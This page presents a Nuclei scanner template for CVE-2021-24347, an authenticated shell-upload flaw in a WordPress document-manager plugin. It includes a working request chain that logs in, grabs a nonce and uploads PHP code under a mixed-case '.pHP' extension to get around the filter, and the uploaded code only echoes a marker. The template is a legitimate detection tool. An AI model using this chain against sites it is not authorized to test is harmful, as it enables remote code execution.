Skip to content
Nuclei Templates

WordPress SP Project & Document Manager <4.22 - Authenticated Shell Upload

ID: CVE-2021-24347

Severity: high

Author: theamanrawat

Tags: cve2021,cve,sp-client-document-manager,wpscan,wp-plugin,wp,authenticated,wordpress,rce,packetstorm,intrusive,smartypantsplugins

Description

Section titled “Description”

WordPress SP Project & Document Manager plugin before 4.22 is susceptible to authenticated shell upload. The plugin allows users to upload files; however, the plugin attempts to prevent PHP and other similar executable files from being uploaded via checking the file extension. PHP files can still be uploaded by changing the file extension’s case, for example, from php to pHP.

YAML Source

Section titled “YAML Source”
id: CVE-2021-24347


info:
  name: WordPress SP Project & Document Manager <4.22 - Authenticated Shell Upload
  author: theamanrawat
  severity: high
  description: |
    WordPress SP Project & Document Manager plugin before 4.22 is susceptible to authenticated shell upload. The plugin allows users to upload files; however, the plugin attempts to prevent PHP and other similar executable files from being uploaded via checking the file extension. PHP files can still be uploaded by changing the file extension's case, for example, from php to pHP.
  impact: |
    Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected WordPress site.
  remediation: Fixed in version 4.22.
  reference:
    - https://wpscan.com/vulnerability/8f6e82d5-c0e9-468e-acb8-7cd549f6a45a
    - https://wordpress.org/plugins/sp-client-document-manager/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24347
    - http://packetstormsecurity.com/files/163434/WordPress-SP-Project-And-Document-Manager-4.21-Shell-Upload.html
    - https://github.com/Hacker5preme/Exploits
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-24347
    cwe-id: CWE-178
    epss-score: 0.96895
    epss-percentile: 0.99708
    cpe: cpe:2.3:a:smartypantsplugins:sp_project_\&_document_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: smartypantsplugins
    product: sp_project_\&_document_manager
    framework: wordpress
  tags: cve2021,cve,sp-client-document-manager,wpscan,wp-plugin,wp,authenticated,wordpress,rce,packetstorm,intrusive,smartypantsplugins


http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=sp-client-document-manager-fileview HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaeBrxrKJzAF0Tgfy


        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="cdm_upload_file_field"


        {{nonce}}
        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="_wp_http_referer"


        /wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1
        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="dlg-upload-name"




        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="dlg-upload-file[]"; filename=""
        Content-Type: application/octet-stream




        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="dlg-upload-file[]"; filename="{{randstr}}.pHP"
        Content-Type: image/svg+xml


        <?php


        echo "CVE-2021-24347";


        ?>
        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="dlg-upload-notes"




        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="sp-cdm-community-upload"


        Upload
        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy--
      - |
        GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower("{{randstr}}.pHP")}} HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains(header_4, "text/html")
          - status_code_4 == 200
          - contains(body_4, "CVE-2021-24347")
        condition: and


    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - name="cdm_upload_file_field" value="([0-9a-zA-Z]+)"
        internal: true
# digest: 490a004630440220133f7d350872d199ae44e622ea7866b4fb6184d039991a5bb01fadfb953cd46e02206683440b703273f881aa94aed5c345d1f663f60a7e62c00e46cc9c0f61a54519:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24347.yaml"

View on Github